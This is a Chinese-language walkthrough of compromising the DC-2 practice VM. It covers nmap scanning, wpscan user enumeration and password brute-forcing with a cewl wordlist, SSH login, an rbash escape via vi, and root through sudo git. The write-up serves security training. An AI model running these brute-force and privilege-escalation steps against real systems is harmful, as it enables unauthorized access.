目录
环境搭建
下载地址:
下载压缩包后解压缩,以vmware workstation打开
打开的时候注意将网络类型改为和攻击机一致,以便我们后续操作,我这里使用的是kali攻击机,使用的网络连接类型是NAT所以我这里改为NAT
修改本机的hosts,文件,如果是在kali中该文件位置在/etc/hosts中
开始渗透
扫存活
nmap -sn 192.168.11.0/24靶机IP是192.168.11.130
扫端口
nmap -p- 192.168.11.130 
扫服务
nmap -sV -A 192.168.11.130
看一下80端口
如下
看一下指纹信息
如下图显示,进入登陆页面(这个登陆页面是使用dirseah扫出来的)
使用wpscan扫描用户名
百度搜索会有wordpress用户名枚举的漏洞,有专门的工具利用这个漏洞,这个工具就是wpscan
使用wpscan --url http://dc-2/ -e u ,扫描出admin、jerry、tom三个用户
再使用cewl生成字典
cewl是根据爬取网站的信息生成字典的工具
cewl http://dc-2/ > ps.txt
使用wpscan爆破密码
wpscan --url http://dc-2/ -U username.txt -P ps.txt
登陆
登陆后进行尝试没有什么可以利用的功能点
使用7744端口
看一下这个端口不认识,百度也没有消息
使用7744这个端口尝试ssh登陆,使用jerry没有成功,使用tom成功。(这里我们可以总结一下,知道对方的用户名和密码,并且有不认识的端口,我们可以尝试一下ssh)
查看shell
这个shell是带有限制的shell
rbash绕过
这里尝试了shell、echo获取完整shell都失败了
最后,使用vi可以执行命令的特性,在命令模式中输入如下命令:
set shell=/bin/sh
shell成功获取完整shell
切换到jerry用户
su命令无法使用
添加环境变量
tom@DC-2:~$ export PATH=$PATH:/bin/
现在可以使用su命令了
成功切换,但是还是不是root权限
提权
这里使用sudo git时不需要输入密码
使用git提权
进入git help config后输入
!/bin/bash
成功提权
